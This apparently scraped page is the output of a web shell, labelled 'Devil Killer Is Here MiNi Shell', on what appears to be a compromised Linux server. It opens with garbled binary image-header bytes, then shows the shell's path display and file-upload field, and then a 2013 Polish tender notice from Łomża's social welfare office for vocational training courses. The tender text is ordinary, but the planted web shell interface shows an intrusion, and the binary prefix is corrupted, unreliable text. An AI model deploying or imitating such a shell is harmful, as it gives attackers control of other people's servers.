JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/71208-N-2013.html

<p class="kh_header"><b>Łomża: Przeprowadzenie szkoleń: obsługa  kasy  fiskalnej, usługi krawieckie, malarz, opiekun osób starszych, stylizacja paznokci, język angielski,  warsztaty wyjazdowe z komunikacji w rodzinie,   prawo jazdy kat C, C+E   w ramach projektu systemowego-  EFS - Nowa droga do sukcesu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 71208 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łomży , ul. Dworna 23B, 18-400 Łomża, woj. podlaskie, tel. 086 2164088, 2164260, faks 086 2165851.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopslomza.pl lub https://e-bip.org.pl/mopslomza/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń: obsługa  kasy  fiskalnej, usługi krawieckie, malarz, opiekun osób starszych, stylizacja paznokci, język angielski,  warsztaty wyjazdowe z komunikacji w rodzinie,   prawo jazdy kat C, C+E   w ramach projektu systemowego-  EFS - Nowa droga do sukcesu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1.  Szkolenie -Obsługa kasy fiskalnej -dla 21 osób  w wymiarze 70 godzin szkoleniowych - 30 godzin teoria i 40 godzin praktyka. 
Szczegółowy opis przedmiot zamówienia. 
Program szkolenia powinien obejmować:
- omówienie obowiązujących przepisów prawno - fiskalnych. 
- wystawianie faktur VAT i rachunków.
- budowa i zasady działania oraz podział urządzeń fiskalnych.
- przygotowanie kasy do pracy. 
- sprzedaż, zwrot opakowań, wykonywanie raportów. 
- współpraca kas z urządzeniami dodatkowymi: czytnikiem kodów i komputerem. 
- obsługa programu do fakturowania. 
- ćwiczenia praktyczne na kasach fiskalnych. 
Wykonawca przedmiotowego szkolenia musi zapewnić uczestnikom:
- warunki zgodne z przepisami bezpieczeństwa i higieny pracy oraz przepisami ochrony przeciwpożarowej w trakcie trwania szkolenia. 
- wyposażenie bazy szkoleniowej powinno umożliwić każdemu uczestnikowi kursu poznanie zakresu zadań i czynności wykonywanych na stanowisku. 
- w ramach kosztu szkolenia wszystkie niezbędne materiały i sprzęt potrzebny do realizacji zajęć praktycznych. 
- każdy z uczestników musi mieć swobodny dostęp do maszyn i urządzeń potrzebnych do nauki zawodu w celu wykonywania ćwiczeń praktycznych. 

Część 2. Usługi krawieckie dla 11 osób 150 godzin - 48 teoria i 102 praktyka.
Program  szkolenia powinien obejmować tematy:
1. Technologia  materiałoznawstwa,
2. Maszynoznawstwo  tj. obsługa maszyn i konserwacja maszyn podstawowych i specjalnych, regulacja maszyn i usuwanie drobnych usterek, maszyny szwalnicze  podstawowe; zasady tworzenia ściegu.
3. Krój  i modelowanie - pojęcia podstawowe z zakresu modelowanie form odzieży,
4. Pomiary sylwetki, wymiary podstawowe i kontrolne, płaszczyzny, linie i punkty  pomiarowe umownie wyznaczane na sylwetkę; symbolika pomiarów, siatka  konstrukcyjna. Modelowanie form spódnicy/spodni/bluzki
5. Praktyczna nauka przeróbek krawieckich.
6. Poznanie poszczególnych technik wykonywania ściegów: ręczne - zasadnicze i ozdobne, pikowanie, haftowanie, obszywanie dziurek,  przyszywanie guzików, wszywanie zamków, skracanie, podwijanie, zwężanie, poszerzanie, wymiany podszewek, obsługa i użytkowanie maszyn stebnówek;
7. Wykonanie spódnicy damskiej ,spodni, bluzki. 
8. Przepisy  BHP.
Wykonawca zapewni  materiały o rożnej strukturze na praktyczne zajęcia szycia oraz manekiny instruktażowe
Koszt materiałów przeznaczonych do praktycznej nauki zawodu nie może przekroczyć 40% całkowitej wartości kursu.

Część 3. Malarz dla 10 osób  w wymiarze 100 godzin  -  22 godz. teorii i  78 praktyki.
Celem kursu jest przyuczenie do wykonywania pracy w zawodzie malarza, w tym nabycie przez uczestników podstawowych umiejętności z zakresu budowlanych prac malarskich.
W cenie oferty muszą być ujęte szkolenie BHP oraz badania niezbędne do uczestnictwa w szkoleniu. 
Program kursu:
-Bezpieczeństwo i higiena pracy
-Materiałoznawstwo
-Technologia
-Organizacja stanowiska pracy
-Przechowywanie farb
-Odpady i ochrona środowiska
-Prace malarskie
-Wykonywanie tynków zewnętrznych i wewnętrznych
-Wykonywanie okładzin ściennych
-Wykonanie izolacji
-Przygotowanie podłoża
-Przygotowanie farb i materiałów do prac malarskich
-Malowanie techniką emulsyjną
-Malowanie techniką olejną
Kurs realizowany będzie w dni powszednie w godz. 8-16  z przerwą na obiad w dni powszednie, nie więcej niż 6 godzin dziennie  przy założeniu, ze jedna godzina to 45 min. Zamówienie musi zostać zrealizowane zgodnie z programem nauczania zgodnym z obowiązującymi przepisami. 
Zajęcia praktyczne ,nabycie umiejętności malarskich, muszą odbyć się po zakończeniu zajęć teoretycznych. Wykonawca przeszkoli uczestników biorących udział w kursie w zakresie bhp.  Wykonawca odpowiada za przestrzeganie warunków BHP w trakcie całego kursu.
Wykonawca zapewni uczestnikom kursu na czas trwania szkolenia konieczny sprzęt, narzędzia, materiały, odzież ochronną ,kombinezon ochronny, rękawice, okulary, i obuwie ochronne dostosowane do kursu i pory roku oraz warunków atmosferycznych, materiały dydaktyczne. Koszt materiałów przeznaczonych do praktycznej nauki zawodu nie może przekroczyć 40% całkowitej wartości kursu.
Kurs zakończy się testem wiedzy z zagadnień przewidzianych w programie szkolenia. Czasu trwania testu nie wlicza się do czasu trwania szkolenia.
Wykonawca odpowiada za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia, jak również za należytą staranność przy realizacji zobowiązań umowy.
Wykonawca przedstawi na trzy dni przed podpisaniem umowy:
1. Dokumenty z których wynika, iż osoby, które będą realizować zamówienie posiadają odpowiedni poziom wiedzy i doświadczenie w zakresie przedmiotu zamówienia. 
2. Program szkolenia sporządzony zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych ,Dz. U. 2012 poz. 186, 3.Szczegółowy harmonogram zajęć. 

Część 4. Szkolenie Opiekun osób starszych dla 17 osób  w wymiarze 120 godzin szkoleniowych.
Szczegółowy opis przedmiotu zamówienia:                                                                                                    
Celem szkolenia jest zdobycie wiedzy i umiejętności z zakresu opieki nad osobami starszymi.
Program szkolenia ,40 godz. teoria, 80 godz. praktyka,: podstawy psychologii, edukacja zdrowotna, zmiany zachodzące w organizmie człowieka pod wpływem starzenia się, podstawy gerontologii, etyka zawodowa, metody terapii i aktywizacji, rola i zadania opiekuna osób starszych, chorych i niepełnosprawnych, bezpieczeństwo i higiena pracy, zajęcia praktyczne:
- pomoc w utrzymaniu higieny osobistej osoby starszej.  
- zmianę bielizny osobistej, pościelowej, przesłanie łóżka.
- pomoc przy załatwianiu potrzeb fizjologicznych - podanie basenu, pomoc w dojściu do toalety.
- zapobieganie powstawaniu odleżyn i odparzeń.
- zmianę pozycji obłożnie chorego w łóżku. 
- zasady żywienia osób starszych.
-opiekę zalecaną przez lekarza - podawanie leków, okłady, nacieranie, karmienie chorego. 
Zajęcia powinny odbywać się codziennie, od poniedziałku do piątku, zaczynać nie wcześniej niż o godz. 8.00 i trwać nie więcej niż 6 godzin dziennie.  
 W cenie oferty muszą być ujęte szkolenie BHP oraz badania sanitarno epidemiologiczne (nosicielstwo) uczestników szkolenia.

Część  5: Szkolenie z zakresu stylizacji paznokci dla  10 osób w wymiarze 32 godzin szkoleniowych  - z zakupem zestawu początkowego.
Szczegółowy opis przedmiot zamówienia. 
Wykonawca powinien w ofercie przedstawić kwalifikacje prowadzącego kurs. Kurs powinien przygotować beneficjentów do praktycznego wykorzystania zdobytych umiejętności dotyczących profesjonalnej stylizacji paznokci metodą żelową. Zajęcia powinny obejmować następujące zagadnienia:
- budowa paznokci, choroby paznokci.  
- materiałoznawstwo, dezynfekcja i sterylizacja.  
- pielęgnacja dłoni.  
- organizacja stanowiska pracy, zasady postępowania w kontaktach z klientami.  
- ćwiczenia na tipsie, ćwiczenia na formie, french, przedłużanie na tipsie z frenchem, zatapianie ozdób w żelu, uzupełnienie paznokci żelowych, zdobienia podstawowe i zaawansowane - cieniowanie, wtapiania, ozdoby, 3D, zdobienia lakierami.
Wymagania:
Salę zapewnia wykonawca. W cenę oferty należy wkalkulować: zapewnienie modeli dla beneficjentów, materiały szkoleniowe oraz zestaw startowy dla każdego uczestnika szkolenia obejmujący:
1.Cyfrowa LCD lampa uv z suszarką
2. Świetlówka uv 9W 4szt.
3. Żel jednofazowy 30ml
4. Żel budujący różowy 30ml
5. Żel budujący przeźroczysty 30ml
6. Żel wykańczający-nabłyszczający 30ml
7. Żel french śnieżnobiały 30ml
8. Żel kolorowy 5ml
9. Waciki bezpyłowe 500szt.
10. Tipsy french w saszetkach 500szt.
11.Tipsy naturalne w saszetkach 500szt.
12. Tipsy przeźroczyste w saszetkach 500szt.
13. Aceton 50ml
14. Cleaner 100ml
15. Zmywacz bezacetonowy 100ml
16. Dozownik na płyny
17. Oliwka do paznokci 15ml
18. Pilnik biały prosty 100/180 5szt.
19. Pilnik czarny prosty 100/180 5szt.
20. Blok polerski 2szt.
21. Separatory na palce 2szt.
22.Patyczki z drzewa różanego 5szt.
23. Zestaw 6 profesjonalnych pędzelków do żelu.
24. Primer 5 ml
25. Klej do tipsów z pędzelkiem, 7,5 g, 3 szt
26. Gilotyna 1szt.
27. Palec do ćwiczeń 1 szt.
28. Szablony do żelu 500 szt.
29. Ozdoby, hologramy w kasetce 12 szt.

Część  6.  Kurs języka angielskiego 10 osób -  60 godzin.
Określenie przedmiotu zamówienia. 
Zorganizowanie i przeprowadzenie kursu języka angielskiego na poziomie podstawowym dla  0 osób w wymiarze 60 godzin szkoleniowych. 
Kurs powinien być zorientowany na praktyczne wykorzystanie poznawanego języka w konkretnych sytuacjach życiowych. Beneficjenci powinni być zmotywowani do prowadzenia rozmów zainspirowanych aktualnymi wydarzeniami. Zajęcia powinny umożliwić nabycie biegłości i śmiałości mówienia w języku obcym. Wykładowca powinien zachęcić do opowiadania o swoich pasjach, celach i potrzebach. 
Beneficjenci powinni w równym stopniu poznać i udoskonalić wszystkie sprawności językowe: mówienie i rozumienie ze słuchu, gramatykę, czytanie oraz pisanie. Podczas zajęć systematycznie powinna być pogłębiana wiedza naszych słuchaczy, która wzbogaci ich słownictwo oraz utrwali struktury gramatyczne. Na zajęciach, oprócz pracy z podręcznikiem, powinny być wykorzystywane materiały audio-video oraz materiały oryginalne, takie jak wycinki prasowe, wiadomości z Internetu, programy telewizyjne czy filmy w wersji oryginalnej.
Tematyka kursu oprócz przełamywania bariery językowej  powinna umożliwić poszerzanie horyzontów beneficjentów, rozbudzić  ciekawość w poznawaniu świata oraz zachęcić do nauki języka angielskiego, ukazać celowość jego poznawania.

Część 7 Prawo jazdy kat  C, C +E  dla  4  osób 
Usługa polegająca na zorganizowaniu szkoleń w celu uzyskania uprawnień do kierowania pojazdami silnikowymi:
1)     prawa jazdy kategorii C - uprawniającego do kierowania pojazdem samochodowym o dopuszczalnej masie całkowitej przekraczającej 3,5 t, z wyjątkiem autobusu, a także ciągnikiem rolniczym lub pojazdem wolnobieżnym;
2)     prawa jazdy kategorii C+E - uprawniającego do kierowania pojazdem określonym odpowiednio w kategorii C, łącznie z przyczepą;
 Zamawiający oczekuje, że wykonawca zorganizuje wskazane wyżej szkolenia w zakresie prowadzonego ośrodka szkolenia kierowców znajdującego się na terenie Łomży 
Zamawiający wymaga, aby:
a) zajęcia teoretyczne odbywały się na terenie Łomży 
b)  zajęcia praktyczne przeprowadzane były pojazdem przystosowanym do nauki jazdy, zgodnie z wymaganiami określonymi w przepisach wydanych na podstawie art. 66 ust. 5 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym. 
Zamawiający wymaga, aby wykonawca w ramach niniejszego zamówienia oraz w ramach wskazanej ceny zapewnił uczestnikom szkoleń wszelkie niezbędne materiały i przyrządy konieczne do przeprowadzenia szkolenia w zakresie teoretycznym, jak i organizacji zajęć praktycznych w części ogólnej oraz w części dodatkowej, w szczególności:
Wymagania: 
Cena badań lekarskich,   przed rozpoczęciem kat C oraz   C,E  egzaminu państwowego dla wszystkich kategorii ujęta w koszcie szkolenia - w cenie oferty. Badania lekarskie  mają  być zapewnione przez Wykonawcę dla uczestników szkolenia: orzeczenia lekarskiego o braku przeciwwskazań zdrowotnych do kierowania pojazdem i orzeczenia psychologicznego o braku przeciwwskazań psychologicznych do  kierowania pojazdem wydanych na podstawie badań, o których mowa w art. 75 ust. 1  oraz art. 82 ust. 1 pkt.  1a, USTAWA z dnia 26 listopada  2010 r. o kierujących pojazdami.
- powinno być wydane  przez  lekarza uprawnionego do badania kierowców. Badania lekarskie niezbędne do wydania orzeczenia lekarskiego na podstawie art. 122 ust. 1 pkt 1 Ustawy Prawo o ruchu drogowym z dnia 20.06.1997r. t.j. Dz. U. z 2005r., nr 108, poz. 908 ze zm. 
- Uczestnicy szkolenia muszą być ubezpieczeni od następstw nieszczęśliwych wypadków od dnia rozpoczęcia szkolenia do dnia zakończenia szkolenia - koszt ubezpieczenia musi być ujęty w koszcie szkolenia - w cenie oferty. 
- Zajęcia teoretyczne muszą odbywać się od poniedziałku do piątku, nie więcej niż 6 godzin zegarowych dziennie  -łącznie z przewidzianymi przerwami. Zajęcia praktyczne w tym na placu manewrowym muszą odbywać się od poniedziałku do soboty, nie więcej niż 3 godziny zegarowe dziennie. 
- Pojazdy mechaniczne na których będzie prowadzone szkolenie muszą być w pełni sprawne technicznie. W przypadku awarii wskazanego w ofercie pojazdu, Wykonawca na okres naprawy zapewni samochód zastępczy. 
- W cenie oferty muszą być ujęte materiały szkoleniowe: zbindowany skrypt lub książka, notatnik, długopis - jakie przekazane zostaną na własność każdemu uczestnikowi szkolenia. Materiały szkoleniowe powinny dotyczyć ściśle tematyki szkolenia, a więc danej kategorii prawa jazdy. Materiały powinny mieć formę co najmniej papierową. W materiałach szkoleniowych przekazywanych uczestnikom szkolenia znajdować się będą aktualne przepisy prawa o ruchu drogowym, w tym wyjaśnienia oznaczeń poszczególnych znaków drogowych, czy też graficzne rozrysowanie zasad ruchu drogowego obowiązujących m.in. na tzw. krzyżówkach , zasady pierwszeństwa, etc. 
-  W ramach kursu wykonawca ponosi koszt: wszystkich niezbędnych badań lekarskich i wymaganych powszechnie obowiązującymi przepisami prawa, jakie musi przejść każda szkolona osoba, koszt kursu teoretycznego dla danej kategorii, koszt kursu praktycznego dla danej kategorii,  koszt egzaminu wewnętrznego przeprowadzanego u wykonawcy, pierwszego podejścia absolwenta kursu do egzaminu państwowego, koszt materiałów szkoleniowych dla każdego uczestnika kursu. Powyższe koszty powinny być wkalkulowane w cenę oferty. 
- Wykonawca zobowiązany będzie do bieżącego prowadzenia w trakcie szkolenia listy obecności uczestników oraz przedstawiania kopii tej listy Zamawiającemu w terminie 3 dni od zakończeniu szkolenia. 
- Wykonawca zobowiązany będzie do prowadzenia dokumentacji przebiegu szkolenia stanowiącej: dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych, protokół z egzaminu wewnętrznego, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji. Na każdym szkoleniu powinna być wydana dla osoby skierowanej karta prowadzonych zajęć i wypełniana codziennie, zgodnie z programem szkolenia. Po ukończeniu szkolenia, nie później niż w terminie 3 dni, zostanie przekazana zamawiającemu. 
- Zamawiający zastrzega sobie prawo do przeprowadzania kontroli efektywności i prawidłowości szkolenia zgodnie z obowiązującym w tym zakresie przepisami i na warunkach określonych w umowie. Ponadto Zamawiający zastrzega sobie prawo do kontroli frekwencji uczestników, jak też prawo wglądu do dokumentów, w tym finansowych, związanych z realizacją niniejszej umowy. 
- Zamawiający nie ponosi kosztów szkolenia osób, które w trakcie szkolenia zostaną z przyczyn leżących po stronie Wykonawcy skreślone z listy uczestników.

Część   8. Warsztaty wyjazdowe   integracyjne dla uczestników i ich rodzin -  jeden dzień - łącznie 100 osób - przewiduje się 75 osób dorosłych i 25 dzieci. 
Wyjazd integracyjny dla uczestników  
I. ETAP Warsztaty w 4 grupach dla osób dorosłych rozpoczną się od godz. 10.00 do 14.00. 
Program warsztatu powinien zawierać następujące tematy: 
- aktywne słuchanie
- wyrażanie uczuć,
- stosowanie wypowiedzi  ,ja, zamiast ,ty,
- zachowania asertywne
Dzieci w tym czasie mają zapewnioną opiekę pedagoga -  zabawy, gry, itp.
Przerwa obiadowa w godz. 14.00 - 15.00
II.   ETAP: Warsztaty rodzinne  w 4 grupach od 15.00 do 17.00. - gry, zabawy, portret  rodziny itp.
III. ETAP: Od godz. 17.15 do ok. 19.00  wspólna kolacja  integracyjna przy ognisku lub  grill, pieczenie kiełbasek itp. 
Miejsce odbywania warsztatu: poza terenem miasta Łomża, odległość maksymalna do 30 km od Łomży. Sale wykładowe i miejsca przeznaczone do prowadzenia zajęć praktycznych powinny spełniać wymogi bhp i p.poż., uregulowane w przepisach odrębnych.
Każda osoba  dorosła powinna otrzymać: 
Materiały szkoleniowe: długopis, notatnik formatu A5, teczkę z gumką do przechowywania dokumentów.   
Każdy uczestnik  wyjazdu powinien mieć zapewnione:
1.	 Wyżywienie  - obiad z dwóch dań, deser,  serwis kawowy w przerwie warsztatów i zajęć, kolacja - dania grillowe - 3 rodzaje, pieczywo, napoje, sałatki.   
2.	Transport uczestników do miejsca odbywania warsztatu i z powrotem do Łomży;
3.	Ubezpieczenie od następstw nieszczęśliwych wypadków powstałych w związku z warsztatem oraz w drodze do miejsca warsztatu i z powrotem dla każdego uczestnika na kwotę minimum 20 000,00 zł.;
Wykonawca powinien zapewnić do prawidłowej realizacji warsztatów:
1. Trenerów do realizacji warsztatów 
2. Trenerów do przeprowadzenia zajęć integracyjnych dla osób z otoczenia uczestników. 
3. Wykonawca zobowiązany jest przeprowadzić  ankietę na zakończenie warsztatu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, co najmniej trzy zamówienia, cykle szkoleniowe, seminaria lub inne formy podnoszenia kwalifikacji w zakresie polityki społecznej obejmującej grupę co najmniej 20 osób</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują ośrodkiem szkoleniowym lub salami szkoleniowymi umożliwiającymi wykonanie zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami, które posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 20 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

